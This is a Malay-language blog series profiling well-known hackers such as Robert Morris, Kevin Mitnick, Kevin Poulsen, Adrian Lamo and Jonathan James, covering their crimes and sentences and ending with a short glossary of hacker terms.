Federal court documents unsealed at the request of the Associated Press show that for almost two years, Smith - then out on bail - worked mostly full time cruising the dark recesses of the Internet while the FBI paid his tab.



Apa yang pihak FBI dapat? Maklumat lengkap mengenai pelbagai jenis penyebar kod-kod virus yang mana akhirnya membawa kepada dua penahanan utama antarabangsa dan mematahkan beberapa lagi cubaan serangan virus.



Apa pula yang Smith dapat? Beliau cuma dijatuhkan hukuman selama 20 bulan di penjara persekutuan yang mana hukuman tersebut adalah kurang 2 tahun daripada hukuman minimum yang diperlukan, dan selama 38 tahun dikurangkan dari hukuman yang dijatuhkan kepada beliau sewaktu beliau didakwa.



Adakalanya, pendekatan sebegini diperlukan. "Pencuri menangkap pencuri", kata Elliot Turrini, seorang bekas pendakwa persekutuan yang telah mengendalikan kes Smith ini dan bersetuju untuk meringankan hukumannya. Lebih kurang dianggarkan sebanyak 63,000 virus dari pelbagai jenis yang beredar di ruang internet yang menyebabkan kerugian berjumlah USD $65 bilion kerana kerosakan dan kerugian, tetapi yang dipenjarakan hanyalah Smith seorang sahaja kerana telah menyebarkan salah satu dari 63,000 virus tersebut.

Top 10 Hacker (Malay version) - Part 5


Robert Tappan Morris

Morris adalah merupakan seorang anak kepada bekas saintis di Agensi Keselamatan Kebangsaan Amerika iaitu Robert Morris. Beliau turut dikenali sebagai seorang pencipta cecacing Morris ( Morris Worm ), yang mana ianya merupakan cecacing yang pertama tersebar di internet. Akibat dari tindakkannya itu juga turut menjadikan beliau orang yang pertama di tahan di bawah akta 1986 Computer Fraud and Abuse Act.



Morris mencipta kod cecaing tersebut semasa beliau masih lagi merupakan seorang pelajar di Cornell. Beliau sengaja menciptanya kerana ingin melihat sebesar manakah rangkaian internet ini dengan harapan agar cecacingnya itu tersebar di seluruh dunia. Bagaimanapun, cecacingnya itu berkemampuan menyalin dirinya sendiri dengan cepat dan ianya telah mengakibatkan sistem komputer menjadi perlahan yang mana menyebabkan komputer tersebut tidak lagi boleh digunakan. Pada ketika itu agak mustahil untuk menganggarkan berapa banyakkah jumlah komputer yang telah dijangkiti oleh cecacingnya itu tetapi para pakar mengandaikan lebih kurang 6000 buah sahaja yang terkena jangkitan cecacingnya itu. Akibat dari tindakannya itu, Morris telah dijatuhkan hukuman penjara selama tiga tahun, dikerah melakukan khidmat masyarakat selama 400 jam dan didenda sebanyak USD$ 10,500.



Kini, Morris bekerja sebagai seorang tenured professor di MIT Computer Science and Artificial Intelligence Laboratory. He principally researches computer network architectures including distributed hash tables such as Chord and wireless mesh networks such as Roofnet.





Levin

Media massa pada ketika itu mengakui bahawa Levin adalah merupakan seorang pakar matematik dan mempunyai degree di dalam jurusan biokimia dari Institut Teknologi Negeri Saint Petersburg.



Mengikut liputan pada masa itu, pada tahun 1994 Levin telah memecah-masuk ke dalam beberapa akaun kepunyaan beberapa pelanggan korporat Citibank melalui perkhidmatan permindahan secara dial-up (Financial Institutions Citibank Cash Manager) dan memindahkan wang tersebut ke beberapa buah akaun yang telah berjaya diciptanya di Finland, Amerika Syarikat, Netherlands, Gemany dan di Israel.Namun pada tahun 2005 seorang alleged ahli dari kumpulan penggodam dari St. Petersburg mengakui sebagai orang yang sebenar yang pertama kali telah memecah masuk ke dalam sistem komputer hakmilik Citibank, menggunakan nama samaran ArkanoiD, beliau telah menghantar satu memorandum kepada sebuah laman web popular Provider.net.ru yang didedikasikan kepada pasaran telekom pada ketika itu mengesahkan bahawa beliaulah orang yang mula-mula berjaya memecah masuk lalu menggodam sistem komputer kepunyaan Citibank tersebut lalu menafikan bahawa bukanlah Levin orang yang pertama yang menggodam ke sistem tersebut. Menurutnya lagi, Levin bukanlah seorang saintis ( ahli matematik, ahli biologi atau yang seumpama dengannya ) tetapi lebih merupakan seorang pentadbir komputer ( admin ) yang telah pun mempunyai data-data / maklumat mengenai bagaimana untuk menggodam sistem komputer Citibank lalu mengeksploitasinya demi kepentingan dirinya sendiri.



ArkanoiD emphasized all the communications were carried over X.25 network and the Internet was not involved. Pada tahun 1994, Kumpulan penggodam ArkanoiD telah mengetahui bahawa sistem Citibank itu sebenarnya tidak dilindungi dan hampir seminggu mereka telah memeriksa struktur rangkaian bank-bank di USA secara kawalan jauh ( remote ). Ahli kumpulan tersebut juga telah cuba menguji sistem tersebut dengan melakukan instalasi perisian dan bermain beberapa permainan komputer tanpa disedari oleh kakitangan bank-bank tersebut. Kesemua para penggodam tersebut tidak merancang untuk melakukan rompakan digital pada ketika itu dan menghentikan aktiviti penggodaman mereka demi keselamatan mereka. Tidak lama kemudian, salah seorang dari mereka telah memberikan data-data berkenaan maklumat sensitif mengenai sistem Citibank tersebut kepada Levin ( dilaporkan maklumat itu bernilai cuma USD $100 ).

Top 10 Hacker (Malay version) - Part 4


Kevin Poulsen

Juga dikenali sebagai Dark Dante, Poulsen gained recognition for his hack of LA radio’s KIIS-FM phone lines, which earned him a brand new Porsche, among other items. Pegawai undang-undang mengandaikannya sebagai " the Hannibal Lecter of computer crime". Pihak berkuasa mula menjejaki Poulsen selepas beliau menggodam ke dalam sistem pengkalan data kepunyaan salah sebuah agensi penyiasatan di Amerika. Semasa dalam tempoh memburunya, beliau masih berkesempatan mempermainkan pihak FBI dengan mencuri dengar informasi berkaitan dengan dirinya melalui sistem telefon agensi tersebut.



Keupayaannya dalam penggodaman lebih menjurus kepada penggodaman sistem dan rangkaian telefon berbanding rangkaian komputer. Penggodaman Poulsen yang paling terkenal ialah bagaimana kemampuannya menyelongkar ke dalam rangkaian telefon kepunyaan radio KIIS-FM dengan menakluk kesemua stesen telefon milik stesen radio LA tersebut. Selain daripada itu, beliau turut mengaktifkan kembali sistem Yellow Page untuk seseorang yang meminta beliau melakukannya bagi menjalankan perniagaan sebuah agensi escort secara maya. In a related feat, Poulsen also "reactivated old Yellow Page escort telephone numbers for an acquaintance who then ran a virtual escort agency." Tidak lama kemudian, apabila gambarnya muncul tanpa kebenarannya di dalam sebuah program televisyen bertajuk Unsolved Mysteries, habis kesemua line telefon untuk program tersebut dirosakkkan oleh beliau. Tanpa diduga, genius seperti Poulsen yang handal menyembunyikan diri di sebalik rangkaian telefon itu telah di tangkap ketika beliau sedang membeli belah di sebuah pasaraya dan beliau akhirnya dijatuhkan hukuman penjara selama 5 tahun.



Semenjak tempoh penahanannya itu, beliau telah mula berjinak-jinak di dalam bidang penulisan dan kini beliau telah pun bekerja sebagai seorang pengarang utama yang terkenal di salah sebuah majalah komputer paling terkemuka dunia iaitu Wired News. Artikelnya yang paling menakjubkan ialah artikel mengenai kerjanya dalam mengesan dan mendedahkan sebanyak 744 identiti pesalah laku seks di dalam profil MySpace.

Top 10 Hacker (Malay version) - Part 3


Kevin Mitnick

Seorang yang pernah digelar "hacker poster boy," Mitnick pernah melalui saat-saat mencemaskan ketika diburu oleh pihak berkuasa. His mischief was hyped by the media but his actual offenses may be less notable than his notoriety suggests. Pihak berkuasa menjelaskan bahawa "beliau merupakan seorang penjenayah computer yang paling dikehendaki dalam sejarah Amerika Syarikat". Cara dan bagaimana beliau mengeksploitasi system computer telah di ceritakan dengan terperinci di dalam filem box office : Freedom Downtime dan Takedown.



Mitnick sebenarnya telah memiliki sedikit pengalaman menggodam sebelum mengakui akan kesalahan-kesalahan yang menyebabkan beliau menjadi terkenal. Pada mulanya beliau telah menggodam system tambang bas Los Angeles untuk membolehkan beliau menaiki bas dengan percuma. Kemudian, seperti bekas pengasas computer dan syarikat Apple, Steve Wozniak, beliau juga terlibat dengan aktiviti phreaker ( golongan yang handal di dalam mengeksploitasi sistem telefon ). Walaubagaimanapun, itu semua adalah kesalahan-kesalahan biasa sahaja jika nak dibandingkan dengan kesalahan terbesarnya yang bersabit dengan dakwaan yang beliau telah memecah-masuk ke dalam rangkaian sistem komputer The Digital Equipment Corporations dan mencuri perisian.



Mitnick’s mischief got serious when he went on a two and a half year "coast-to-coast hacking spree." Sebuah artikel dari CNN bertajuk, "Legendary computer hacker released from prison," menyatakan yang sebelum penangkapannya, beliau telah berjaya merosakkan sistem komputer yang dipecah-masuk olehnya, mencuri data-data dan rahsia-rahsia korporat peringkat tertinggi, merosak dan merumitkan rangkaian telefon dan juga memecah-masuk ke dalam system computer Amaran Pertahanan Kebangsaan Amerika Syarikat. Tidak cukup dengan itu, beliau juga telah berjaya menggodam komputer kepunyaan seorang pakar komputer terkenal iaitu Tsutomu Shimomura yang juga merupakan seorang penggodam. Mitnick telah mencabar Shimomura untuk menangkap beliau yang mana akhirnya disebabkan oleh kesilapannya sendiri, beliau telah berjaya di tahan oleh pihak berkuasa yang telah bekerjasama dengan Shimomura. Itupun setelah Mitnick dikhianati oleh teman wanitanya sendiri.



Pada hari ini, Mitnick telah pun meninggalkan peranannya sebagai seorang black hat hacker dan berubah menjadi seorang yang berguna kepada masyarakat. Tsutomu Shimomura juga telah menjadi sahabatnya dan mereka berdua kini merupakan oldtimer dan sering bekerjasama untuk menumpaskan para "penggodam dunia baru". Di atas kesalahannya itu beliau telah di jatuhkan hukuman penjara selama 5 tahun. Selama 8 bulan dalam 5 tahun tersebut He served five years, about 8 months of it in solitary confinement, kini beliau merupakan seorang perunding keselamatan komputer, pengarang, dan penceramah.

Saturday, 24 September 2011

Top 10 Hacker (Malay version) - Part 2


Adrian Lamo

Lamo mengakui yang beliau menjadi terkenal kerana beliau telah berjaya memecah-masuk ke dalam sistem komputer organisasi besar dan hebat seperti The New York Times dan Microsoft Corporation yang terkenal dikalangan para penggodam sebagai kompeni yang mempunyai tahap sistem kawalan keselamatan rangkaian komputer yang tinggi. Beliau turut dikenali sebagai "homeless hacker," kerana beliau menggunakan internet di Kinko Siber Kafe, rangkaian kedai kopi seperti Starbuck dan juga perpustakaan awam untuk melakukan aktiviti penggodaman beliau. Di dalam sebuah artikel profil, beliau dinyatakan sebagai seorang yang "He Hacks by Day, Squats by Night," Lamo reflects, "I have laptop in Pittsburgh, a change of clothes in D.C. It kind of redefines the term multi-jurisdictional." 



Cara Lamo memecah-masuk sesebuah sistem lebih kepada pengujian penetrasi / pemecah-masuk, yang mana sekiranya beliau menjumpai "lubang kebocoran" di dalam system keselamatan computer itu maka beliau akan mengeksploitasi kebocoran tersebut kemudian beliau akan memaklumkan kepada admin computer kompeni yang menjadi mangsa beliau tersebut. Kononnya tindakan beliau itu lebih kepada membantu kompeni tersebut memperbaiki tahap keselamatan rangkaian system computer mereka. Yang menjadi mangsa penangannya termasuklah kompeni-kompeni hebat seperti Yahoo!, Bank of America, Citigroup dan Cingular. Adalah tidak menjadi kesalahan dari segi undang-undang apabila white hat hackers diupah oleh sesebuah kompeni untuk melakukan pengujian penetrasi ke atas system computer mereka, tetapi apa yang dilakukan oleh Lamo adalah bertentangan dengan undang-undang siber kerana tiadanya hitam-putih yang dikeluarkan oleh kompeni yang menjadi mangsa pengujian penetrasinya itu.



Apabila beliau telah berjaya memecah masuk ke dalam system intranet The New York Times, keadaan menjadi serius. Beliau telah sengaja meletakkan dirinya sendiri di dalam satu senarai golongan yang berkepakaran tinggi dan senarai penyumbang terbesar di dalam dunia pengkomputeran. Beliau juga melihat informasi sulit dan peribadi kepunyaan para penyumbang tersebut termasuklah nombor Social Security kepunyaan para penyumbang tersebut. Lamo juga telah menggodam pengkalan data The Times’ LexisNexis untuk melakukan pencarian hal-hal dan informasi yang berprofil tinggi.



Disebabkan oleh aktiviti penggodaman dan kesalahan beliau memecah-masuk system computer kompeni The New York Times, Lamo telah diarahkan untuk membayar ganti rugi lebih kurang USD $65,000 in restitution. Beliau turut dijatuhkan hukuman tahanan rumah selama 6 bulan dan 2 tahun di bawah pemerhatian yang mana ianya telah pun berakhir pada 16 Januari, 2007 yang lalu. Sekarang ini Lamo bekerja sebagai seorang penulis dan penceramah bebas yang disegani. Hasil ceramah dan penulisan beliau mengenai keselamatan system computer seringkali memenangi dan mendapat penganugerahan.

Top 10 Hacker (Malay version) - Part 1


Jonathan James

James adalah seorang remaja bawah umur yang pertama di dunia yang ditahan dan dipenjarakan kerana kesalahan menggodam. Umur beliau ketika dihukum penjara adalah 16 tahun. Ketika ditemubual oleh pihak media, beliau mengakui yang beliau menggodam demi kepuasan dan kegembiraan. Apa yang menggembirakan dan memberikan kepuasan kepada beliau ialah dengan melihat setahap mana kemampuan dirinya terhadap aktiviti penggodaman dengan mengeksploitasi pengetahuannya di dalam dunia pengkomputeran dan rangkaian komputer.



"I was just looking around, playing around. What was fun for me was a challenge to see what I could pull off." Ketika ingin melakukan aktiviti penggodaman, James akan menetapkan sasaran utamanya yang kebiasaannya terdiri dari organisasi yang berprofil tinggi. Beliau telah berjaya memasang perisian backdoor ( sejenis Trojan ) di dalam server DTRA (Defense Threat Reduction Agency ). DTRA merupakan sebuah agensi dari Jabatan Pertahanan Amerika Syarikat yang bertanggungjawab sepenuhnya memantau tahap keselamatan Amerika Syarikat dan negara-negara lain dari sebarang jenis ancaman senjata nuklear, biologi, kimia, konvensional dan senjata rahsia dari seluruh dunia ( musuh ). Backdoor yang diciptanya itu membolehkan beliau melihat, membaca dan menyimpan pelbagai jenis email-email sensitif, kata laluan dan kata nama para pekerja DTRA tersebut.



Selain daripada itu, James juga berjaya memecah-masuk ke dalam rangkaian komputer NASA dengan mencuri sejenis perisian yang bernilai lebih kurang $USD1.7 juta ( RM5.95 juta ). Mengikut jurucakap dari Jabatan Keadilan, "The software supported the International Space Station’s physical environment, including control of the temperature and humidity within the living space." NASA terpaksa menutup rangkaian komputernya dan mengakibatkan kerugian sebanyak USD$ 41,000. James bagaimanapun menjelaskan tujuannya memuatturun perisian tersebut adalah kerana beliau ingin meningkatkan tahap pengetahuannya di dalam pengaturcaraan C ( Sejenis bahasa komputer ), tambahnya lagi "Tetapi kod perisian tersebut sendiri agak teruk, macam tu punya perisian pun mereka katakan bernilai USD$ 1.7 juta? Memang tak padan langsung!"



Dengan kesalahan yang dilakukan oleh James yang juga dikenali sebagai "c0mrade" sekiranya beliau merupakan seorang dewasa, pastinya hukuman yang akan dijatuhkan kepada beliau adalah sekurang-kurangnya penjara selama 10 tahun. Selain dari itu, beliau juga akan di haramkan menggunakan sebarang jenis komputer dan akan dikerahkan menjalani hukuman tahanan di rumah. Bagaimanapun beliau cuma menjalani hukuman penjara selama 6 bulan kerana melanggar parol yang ditetapkan ke atas beliau. Pada hari ini, James telah pun insaf dan berjanji akan menggunakan kepandaiannya untuk kebaikan semata-mata. Beliau berkemungkinan akan memulakan sebuah Syarikat Keselamatan Komputernya sendiri.

Istilah / Terminologi Hackers


Black Hat Hackers ( Penggodam berniat jahat) merupakan sebilangan kecil kumpulan yang terdiri daripada manusia yang genius di dalam penguasaan dan penggunaan teknologi pengkomputeran yang mampu melakukan apa saja terhadap sistem komputer, kebiasaannya berkemampuan untuk berhubung / mengeksploitasi / menggunakan tanpa kebenaran / memecah-masuk sistem dengan mana-mana komputer yang mempunyai sambungan ke internet walaupun tahap keselamatan komputer tersebut telah pun dipertingkatkan. Mereka ini juga dikenali sebagai seseorang yang mensubversi keselamatan komputer tanpa izin atau menggunakan teknologi (biasanya sebuah komputer ataupun internet) untuk tujuan keganasan, vandalisme, penipuan kad kredit, pencurian identiti, pencurian hak milik intelektual, dan sebagainya. Ini juga bermakna mengambil alih kawalan komputer lain melalui sebuah rangkaian, atau software cracking.


White Hat pula digunakan untuk melabel seseorang yang genius di dalam ilmu pengkomputeran tetapi sangat beretika dengan pengetahuan tersebut tanpa menyalahgunakan kemampuannya untuk merosakkan sistem komputer yang lain. Boleh dikatakan bahawa mereka ini adalah dari golongan Penggodam beretika yang memecah keselamatan tetapi untuk tujuan altruistik ataupun sekurang-kurangnya tidak berniat jahat. White Hat biasanya mempunyai etika yang jelas, dan selalu berusaha untuk bekerja dengan pengilang atau pemilik demi untuk memperbaiki kelemahan yang dijumpai dalam setiap produk @ keluaran, walaupun ramai juga yang mengancam sama ada yang tersirat atau jelas untuk memaklumkan kepada awam selepas tempoh yang "sesuai" untuk memastikan respons yang kena pada waktunya ( Hacktivism / Propaganda ). Istilah ini juga digunakan untuk penggodam yang merekacipta dan mengekod sistem yang lebih selamat.


Terma perkataan Cracker yang kebiasaannya ditujukan kepada Black Hat Hacker telah dicipta oleh Richard Stallman untuk membezakan golongan Hacker dan Cracker. Mereka adalah seseorang yang cenderung untuk melakukan aktiviti / proses "memecah-masuk" sebarang jenis kata laluan pada sesetiap jenis perisian (Software Cracker). Golongan ini amat bijak dalam usaha untuk memecahkan sesuatu kata laluan. Mereka juga lebih cenderung / genius dalam mentafsir / mengubah kod-kod sumber yang ada dalam setiap jenis perisian untuk menjadikan perisian tersebut seperti yang asli. Kebanyakkan perisian komputer yang dicetak rompak sebenarnya adalah hasil kerja golongan cracker ini kerana mereka mempunyai kemampuan yang khusus dalam mengatasi tahap mekanisma perlindungan penyalinan perisian. Mereka ini jarang / tidak mengeksploit rangkaian komputer, cuma lebih kepada perisian yang berasaskan komputer semata-mata.



Script Kiddies pula ialah golongan yang penuh dengan keegoan dengan tahap pengetahuan penggunaan komputer yang tidak seberapa tetapi seringkali menyusahkan Juruteknik Komputer. Golongan ini seringkali dikaitkan sebagai seseorang yang gopohgapah dalam melakukan sesuatu yang melibatkan aktiviti penggodaman ( Hacking ). Namun begitu keupayaan mereka dalam penguasaan computer sama sekali tidak boleh dipandang ringan kerana hampir 50 % virus dan bermacam bentuk ancaman computer yang tersebar di seluruh dunia adalah disebabkan oleh golongan ini. Mereka menggunakan sebarang perisian ( tool )yang direkacipta oleh golongan hacker tanpa mengetahui apakah tujuan dan akibat perisian tersebut jika disalahgunakan. Mereka selalunya membuta tuli menggunakan sesuatu perisian tersebut tanpa mengikut arahan / panduan perisian itu sendiri.